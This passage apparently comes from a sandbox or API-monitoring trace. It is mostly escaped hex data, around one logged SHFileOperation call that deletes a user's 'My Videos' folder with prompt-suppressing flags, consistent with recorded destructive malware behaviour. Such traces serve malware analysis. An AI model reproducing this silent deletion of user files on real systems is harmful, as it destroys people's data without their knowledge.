9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae") | out: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\xce31\xd39b\x5980\x21a8\x6162\x43d7\x1370\x1172\x7976\x5a07\x9109\xa76f\x7e3e\x963f\x5a0f\x75f0\xc5d3\x17c6\x80f2\x4b15\x790\x6998\x77ee\xe1b8\x106e\x4e7b\xb858\xb4cc\xdf97\x2186\x646e\xed7f\x6c2b\xbd58\xb37c\xece3\x9927\x707b\x755f\xf280\x7ca6\xadbd\xe05f\x6266\x56d6\xe8d4\x883e\x1c0b\x6ff5\x8b29\xf9fc\x4737\x290c\x7e67\xb211\x1bf5\x2a65\x3492\x1bbe\x96be\xa236\xc209\x1903\x16b7\x5284\xe42c\x2b44\x6477\x5918\xafeb\xd3ac\xa3f7\xce3f\xe050\x8d69\x5d72\x5cec\xa1ca\xc84d\x5912\xc2d0\xec77\xb9f2\x7054\xf423\xfb63\xb87d\xa672\xfbfd\xbe3e\x176\xe457\x4a2e\x72b9\x2140\x414\xe0a6\x704\x6193\xc282\x4276\x84f7\x443f\x8365\xe71d\x1acb\x488\xc8a2\x6c4b\xc05c\x9acf\x2753\x3068\x3c6\xda40\x957f\x12f4\x1ff6\xe2d0\x7d85\x7695\xafd3\x1d41\x693b\xee82\x2ae3\x4200\xe79a\xe2ce\xd3f6\xb26b\xaaf7\x4fd5\xe162\xc869\xb82e\x1d44\x682a\x9215\x4834\x9cd5\xd802\xdcbb\xacc3\x9ab2\xe78b\x8d95\x835c\x21e3\x6058\x50b3\x810\x70ae\x35f\xf962\x58c2\x1022\xcc01\xdbb4\x92de\x9184\x7696\x92b3\x7c3e\x9cf6\x6695\xc520\x6d38\x89ea\x85c0\xd69e\x97a\xd6e8\x4d0f\xb53\xef3d\x2ec6\xa308\xa94c\x4fcb\x6797\xc44\x8033\xc11f\x8845\xe71f\xefae\xea30\x301d\xbfc2\xb004\x111a\xbfe3\xd336\x6f96\xc5c1\x59bd\xd3f8\xd102\x44e3\x3a0c\x8db\x780\x8854\x9dc9\xe7c7\x5b0a\x5bb2\x9c8a\x425b\x351f\x2818\x497\xca94\xda0d\x4dd9\xb56c\x1319\x9034\x40e\x6faa\x53f8\xd504\xf1ed\x3ea8\xa408\x151e\xc3c5\x619b\x3716\x120d\x57a2\x8746\xd1df\xb65b\xd0d\x7e5b\x220d\x78c6\x1e1d\x9061\xad6a\xdd1\xc895\xc856\x1fb1\x6791\x4d87\xf917\xffb4\xf977\x408a\x1bd3\x6cbf\x6432\x1eb5\xc626\x23b8\xa052\xc31f\xd7d\x1c98\x6e07\xee8f\xffa\xb60a\x4729\x727a\xd2c3\x61bb\x4e33\xb9ea\x43fb\xdd5b\x171c\x6586\x7940\x2bf4\xb342\xa171\x6a19\x772c\x7ac8\x681a\x6641\x23da\x9198\x66ee\x7e97\xe38f\x1236\x1af7\xc49d\x15dc\xfd8\x4e99\x51fb\x9c58\xcdd2\x2277\x8f0d\x481c\xd330\xd96e\x452c\xb4d2\x3e04\xef3d\x5236\xbe54\xe15b\x8a76\xfa5\x647b\x9f8c\x8259\xeec2\x7660\xb019\x4d9b\xe117\x3cac\x6f89\xc9b8\x7ec7\x9fb\x6e54\xac3d\xc685\x4196\x7e95\xdc63\x9247\xc89e\x2927\xe77c\x3c26\xc93a\xba32\x3485\xee8f\xcc11\x8493\x922\x2e9e\x2504\xfc7c\x24a6\xb04c\xce5\x8cf7\xe168\x399\x17\x6c3a\x117e\x3b8\xa133\x7f14\xdc70\xe147\xe604\xcd3d\xa493\xe5be\xddc7\x741a\xac5\x173f\xc1e9\x210a\x47f9\xcfd6\x2ade\x7645\xc17\x2305\xe20\x72ac\xc0e3\xdc05\xa8a4\xf81e\x1fc4\xca17\x4db8\x689\x132d\x29c2\x783b\x2485\xcc98\xdca8\x4633\x7abb\xb74\xfe60\xba3d\x514b\x6813\x4f0d\x9c10\x26e5\xcd98\x9846\x6fc3\xc5ab\xba1c\x896e\xc7ec\x6998\x31c7\x6e8a\x8ee9\x6498\xb90a\xd4d4\xa662\x5e3d\xb82d\x18fb\x7fc4\xd374\x388e\xcdb5\xc646\x8595\x736f\xda35\x8188\xec8c\xa426\x2c2f\x4cd6\x4bfb\xcf75\x8b59\xc8bc\xf8fe\x9eac\xcda\xfe0e\xd617\x6d96\x7d62\x7973\x807d\x1725\xea47\xedcb\x6fa9\xd62e\x30b2\x5f56\x7c71\xf57d\xfa91\x87ae\x666c\x6183\x565a\x83fc\x18d7\xb5f1\xf6a4\x2b7b\xfb90\x7fd9\x939\x6d44\x522b\x39b7\xa6ea\xbe6a\x485f\x33ed\xec05\x38a6\xe4d8\x4c28\xb015\x7131\x8bb0\xb0a2\x42b\x606c\x2c1c\x3aa9\x33e2\xc208\x3dad\xc04d\x26bb\x3c02\x4851\xedac\xda66\x8dc6\x1b3d\x1928\x9b51\xb50d\xf8e7\x5051\xacac\xe879\xc82a\x7f9\x89c8\x3946\x5dc8\xb98d\x71fb\x6d9\xbc96\xa356\xe1fb\xbe50\x5bac\x5d68\x6ed0\xf3f7\xa45d\xea17\x1aa2\xf473\x651c\xe1ea\xb8dd\xf393\x46d4\x31be\xe5f6\x1eee\x93d7\xbedf\xa3c9\x3cc2\x19aa\xbf8a\x2275\xd2d7\x1b26\xa188\x42b\xf4\xb342\x37ed\xe44c\xff7b\xbd00\x4386\x14ef\x6d0\x7501\xa0c5\x7117\x9e68\x6e80\x5012\xc4b\xe0ea\x11d0\xba02\x4045\xe3ff\x428b\x5ebf\x5083\x809b\x2ebe\xf5a0\xe831\x1c07\xd9fa\x39bf\xfff4\xf404\x18d5\x9eb4\x1b43\xf405\x125\x175d\x6e83\xd0e0\x8bf\x73e8\x7a02\xc5f\x5bfa\x7d0e\x4054\x129f\x9bd0\xd062\xe0a\x2c5d\xcfa0\x6808\xc56\x98ba\xb43\xf405\x171\x1fed\xce83\xd0e6\x231\x54a\x5bf4\x146f\x813a\x743\x6808\x80a5\x17be\x5e83\xa1ce\x6f5d\xe870\x16a\x8ead\x741\x6872\x1bdb\xfa3c\x2f25\x1d17\x8e1e\x644c\x2ed0\xe871\x9166\x10d7\x5779\xf2c4\x517e\xd08e\xdfe7\xaf88\xcef7\x7418\x873f\x12ae\x47d0\x3404\x62f\x877d\xe743\x680a\x80b9\x888e\x5f41\xd0e5\xbd09\xb5ea\xa0c5\x704f\x5ba8\x5740\xe80a\xf967\x71b1\xd0e6\x104\x407d\x1b40\xd063\x393b\xfd94\x438b\x16ef\xbfd0\xa0c4\x1c85\x43ba\xa740\xe80b\x31a3\xf5e8\xfa1c\x809a\x4fa\x7174\xea0c\xd0e6\x4c7\x9274\x1680\xa0c6\x397d\x58b4\x5540\x1d01\x8313\x9776\x7421\x809a\xb66\x80e8\xf418\xe13\x46bd\xaf40\xd010\x9ae\xe851\xe4e\x281d\xc3a0\xb405\x62d\x937d\xbb43\xc9ff\x6ba3\xf027\x1df9\x9b12\x17df\xf439\x17d\xc3fd\x4e04\x4fb5\x7772\x889c\xccad\x351c\xa1f\xf98e\xb6\x42bd\x7710\x1b5e\x1279\xcf80\x81ec\xf703\x1745\xa183\x12ff\x47c5\xd812\x8830\xc32\xc297\x9a2f\x5202\x3761\x5728\xa822\xe14c\xc112\x6330\x36bc\x964f\xc0e4\x4d80\x63df\xda34\xc5ea\x7a9a\x8c6d\x69a7\xd4a1\x2ee0\xe960\xb7b\xad68\x71ea\xfde8\x5771\xc6a6\x8a49\x11b6\x7ba3\xc950\x9451\xe191\x5add\xa7e3\x5ade\x5d47\xfedc\x2e1a\xae82\xb85b\x58ee\xb47e\x1f90\xb51f\xa9bf\x446\xad7\x1e77\xd0c4\xec93\xd479\xbaaf\x5ba2\xbfda\x8dc1\x9b88\x6cac\x64f1\x5ede\x62a5\x2458\x8ee2\xbcc9\xa9c5\xf8c6\x16df\x1f71\x1b0f\xca00\x6c4d\x52b6\xc451\x65b7\x78ae\x9e1c\xd6ea\x7801\x27a2\xd764\x720f\x5055\x7a5\x2ed9\x6e82\x505b\xe57c\x3c16\x12b2\x8b1a\xa845\x58d5\x82c2\xd8e0\xe6a7\xefa3\x7bda\xda66\x7fe4\xc7a2\xead0\xa1cf\xc19a\xc050\x2822\x1e80\xddc4\x109b\x2ee1\x9565\x65a3\x67e1\x81d7\x39bb\xc826\xdd7b\x96e3\x62e4\x1b44\x67e1\xdf52\x5c82\xb9f3\x5007\xaa8a\x81f2\x6ee6\xf5ae\x4f64\xc937\xc6ec\x9c93\x91cd\xbe92\x5ae5\x3d9a\x20ef\x7816\xd510\x97f9\x926\x3608\xa34a\x9175\x1a58\x3d89\xce24\xbb18\xbd20\xed5a\x2174\xed96\xeb62\x20fc\x2c83\xf4da\xfa2d\xa41d\xfcad\x3087\x8407\x808\x2762\x587f\xdd3a\xeb0b\x2c28\x79c2\x92eb\x92ab\xe416\xeb66\x2a69\xd8b4\x4984\xb3ab\x8bf8\xc86a\x6ff8\xa2a1\x4f92\x2d70\xcbca\x7aab\x9dc3\xb30d\x8ac1\x7771\xc43c\xe4d7\x2819\xb746\xb468\xcf86\x99a2\xea36\x621f\x8eb\xd67\xf9a5\x7bb1\x3484\xf38f\xd20a\x483c\x8bf1\xdd40\xcd2c\xa889\x779a\xf5d5\xd548\x4bc\x1af6\x73b4\xd9e7\xcf91\x2f9c\xcd72\x22f9\x8fef\x148f\xb751\x9461\x8fd8\xfda1\x9f85\x1f44\x8b10\x3ae\xc602\xc3a3\x335\x238\x9dc7\x3833\x8ac9\xd2e2\xb129\xc174\x361c\x3fb9\x7417\x204f\xa22d\x1f0b\xcd09\xa276\x9b7f\x75c4\x78cf\x31c3\x6faf\x5c68\x7539\x2213\x38e5\x6585\x942b\x57e6\x4e65\xdb2f\xa1bc\xec9\x99a4\xccab\x56d\x5ad6\x3241\x9457\xb1c\xc7a9\xee8c\x4b7e\xaa13\xa153\xbaf8\x5af2\x2a2f\xa8ee\x1b68\xfb27\xcaaa\x5ac4\x2824\x7a95\xd9b7\xde50\x8ad1\x71d4\x143e\xf68b\xd66a\x555a\x98d9\xc037\x6ca7\x9d9c\xf500\xfba5\x35ad\xcabe\xfac3\xb445\x4530\xecf3\x492d\xc4a2\xdd61\x79a1\x94f6\x55f4\x6b71\x26b9\xe7c3\x2e69\x24f9\xf7bb\x815\x76f1\xd477\x2e15\x1bfc\xc6ca\xec2d\xae1a\xe824\x4823\x11e6\x183c\x3103\x506b\x4219\x355f\xe79a\x65ae\x4fc3\x1ab4\xb2ed\x6b70\x65e8\xa747\x9bb5\x6e0a\x4a03\x75ca\x56e8\xcce\x38c8\x6d62\xaecc\xcf29\xabc5\x254\x9b29\x2d93\x9d08\xae9a\x593c\xcbd3\x131f\xc4a5\x2161\x864\xd934\x7b4c\x75e5\xf694\xb1d0\xa8b4\x8481\x38e6\xa860\x4a92\x7bfe\x5d56\x3fc2\xcf74\x647c\xcb9f\x8f5f\x5bb8\xad9a\x8961\x10a1\x9eb6\xcdcf\x271c\x41df\xe56c\x1b17\x134\xf78\x2f80\xaf9\x77a4\x3f91\x7a94\x5380\xf64c\x7ceb\xa45b\xbe62\xee7c\x1e1e\xa254\x4af3\x4606\x412a\x4df\x4434\x1545\x4b0b\x5f9c\xaa6f\x3e7f\xadea\xf534\x2c56\x1cca\xc9f5\xc26b\x2d77\x1735\xc1c3\xebd4\xc3c5\x1e23\xe6e3\xcb8b\x7019\xa21c\xb22c\xc4c7\x4596\xf90f\x8fb2\x2f79\xcfbe\x30bd\x4db\x6825\x766e\xdd17\x7c63\x5161\xb62a\x7e23\x617c\xefd1\xafc1\xfc02\x6d9a\x617c\xa7d5\x5f1b\xf4d8\x8d2b\x122f\x81f4\xee6\x2c7d\xe3bb\xd307\x188c\x875c\x371c\x70cd\xb01e\x4dbb\x70f3\x538c\x9ff\xe8f\x39ca\xd8cf\x4537\xdfd4\x11e1\xe5e\xdfe1\xf08b\x1833\xc45e\x29c6\x33c2\x950e\xa346\xecd1\xc458\x5e77\xbfd7\x39c8\xeda\xc8ad\xb89e\x925f\x6f72\xe9b5\x7017\x79af\x1260\xedb5\x6236\x46dd\x8d3c\xac25\xb057\x8ed4\x2cc9\xbf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\